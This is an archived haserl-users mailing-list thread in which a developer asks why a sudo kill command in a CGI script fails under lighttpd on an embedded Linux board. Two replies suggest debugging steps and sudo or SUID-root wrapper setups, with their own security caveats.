gid=33(www-data) groups=29(audio),33(www-data),38(led) result is Empy, kill silently fail. Strange thing is that if i su to www-data on the console, pass the same command "sudo /usr/kill -9 1593" to haserl wrapper, i have the process correctly killed. > > At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote: >> Dear, >> >> i am working on an embedded linux, arm based board, and using very >> nice haserl tool. >> >> I am trying to issue a "kill -9" from a .cgi passed to haser_wrapper. >> >> this is the script of the "test.cgi" : >> >> <% . /usr/local/lib/cgi/generic.sh; print_http_hdr %> >> <% >> echo test kill >> >> sudo /usr/kill -9 1593 >> %> >> >> >> If i work on console and pass the file to haserl_wrapper, it works, >> the process is killed properly. > >From web (using actually lighttpd), echo is redirected as web output >> and kill doesn't work. >> >> Every help is really appreciated. >> >> Thanks, >> Angelo >> >> ------------------------------------------------------------------------------ >> Subversion Kills Productivity. Get off Subversion & Make the Move to Perforce. >> With Perforce, you get hassle-free workflows. Merge that actually works. >> Faster operations. Version large binaries. Built-in WAN optimization and the >> freedom to use Git, Perforce or both. Make the move to Perforce. >> http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk >> _______________________________________________ >> Haserl-users mailing list >> Has...@li... >> https://lists.sourceforge.net/lists/listinfo/haserl-users > |
|
From: Scott S. <ha...@my...> - 2014-03-06 18:42:29
|
You can also create a wrapper for haserl to call that provides the desired functions, and then configure sudo to allow the web user to execute that one script. You can even control the options accepted with sudo. This is flexible and easy to maintain, and you can move additional logic out into the wrapper. Again, not the best security in a wide open system, but in a closed environment it works acceptably well. I have one site going on 6 years and no breaks. On Thu, Mar 6, 2014 at 12:04 PM, Daniel Griscom <gr...@su...>wrote: > I doubt your web server executes scripts with the permissions > necessary to run sudo without a password (I certainly hope not). > > In any case, I'd put in some test echo statements that give the ID of > the process when the script is executed, and perhaps echoed the > return value of the sudo (i.e. did it fail?). > > You might want to make an external script (kept OUTSIDE of the web > tree) that is SUID root and does what you need it to. Then have this > script execute the SUID one. Even that's a bit iffy in the security > department, though. > > > Dan > > > At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote: > >Dear, > > > >i am working on an embedded linux, arm based board, and using very > >nice haserl tool. > > > >I am trying to issue a "kill -9" from a .cgi passed to haser_wrapper. > > > >this is the script of the "test.cgi" : > > > ><% . /usr/local/lib/cgi/generic.sh; print_http_hdr %> > ><% > > echo test kill > > > > sudo /usr/kill -9 1593 > >%> > > > > > >If i work on console and pass the file to haserl_wrapper, it works, > >the process is killed properly. > >From web (using actually lighttpd), echo is redirected as web output > >and kill doesn't work. > > > >Every help is really appreciated. > > > >Thanks, > >Angelo > > > > >------------------------------------------------------------------------------ > >Subversion Kills Productivity. Get off Subversion & Make the Move to > Perforce. > >With Perforce, you get hassle-free workflows. Merge that actually works. > >Faster operations. Version large binaries. Built-in WAN optimization and > the > >freedom to use Git, Perforce or both. Make the move to Perforce. > > > http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk > >_______________________________________________ > >Haserl-users mailing list > >Has...@li... > >https://lists.sourceforge.net/lists/listinfo/haserl-users > > > -- > Daniel T. Griscom gr...@su... > Suitable Systems http://www.suitable.com/ > 1 Centre Street, Suite 204 (781) 665-0053 > Wakefield, MA 01880-2400 > > > ------------------------------------------------------------------------------ > Subversion Kills Productivity. Get off Subversion & Make the Move to > Perforce. > With Perforce, you get hassle-free workflows. Merge that actually works. > Faster operations. Version large binaries. Built-in WAN optimization and > the > freedom to use Git, Perforce or both. Make the move to Perforce. > > http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk > _______________________________________________ > Haserl-users mailing list > Has...@li... > https://lists.sourceforge.net/lists/listinfo/haserl-users > |
|
From: Daniel G. <gr...@su...> - 2014-03-06 18:36:26
|
I doubt your web server executes scripts with the permissions necessary to run sudo without a password (I certainly hope not). In any case, I'd put in some test echo statements that give the ID of the process when the script is executed, and perhaps echoed the return value of the sudo (i.e. did it fail?). You might want to make an external script (kept OUTSIDE of the web tree) that is SUID root and does what you need it to. Then have this script execute the SUID one. Even that's a bit iffy in the security department, though. Dan At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote: >Dear, > >i am working on an embedded linux, arm based board, and using very >nice haserl tool. > >I am trying to issue a "kill -9" from a .cgi passed to haser_wrapper. > >this is the script of the "test.cgi" : > ><% . /usr/local/lib/cgi/generic.sh; print_http_hdr %> ><% > echo test kill > > sudo /usr/kill -9 1593 >%> > > >If i work on console and pass the file to haserl_wrapper, it works, >the process is killed properly. >From web (using actually lighttpd), echo is redirected as web output >and kill doesn't work. > >Every help is really appreciated. > >Thanks, >Angelo > >------------------------------------------------------------------------------ >Subversion Kills Productivity. Get off Subversion & Make the Move to Perforce. >With Perforce, you get hassle-free workflows. Merge that actually works. >Faster operations. Version large binaries. Built-in WAN optimization and the >freedom to use Git, Perforce or both. Make the move to Perforce. >http://pubads.g.doubleclick.net/gampad/clk?id=122218951&iu=/4140/ostg.clktrk >_______________________________________________ >Haserl-users mailing list >Has...@li... >https://lists.sourceforge.net/lists/listinfo/haserl-users -- Daniel T. Griscom gr...@su... Suitable Systems http://www.suitable.com/ 1 Centre Street, Suite 204 (781) 665-0053 Wakefield, MA 01880-2400 |
2 messages has been excluded from this view by a project administrator.
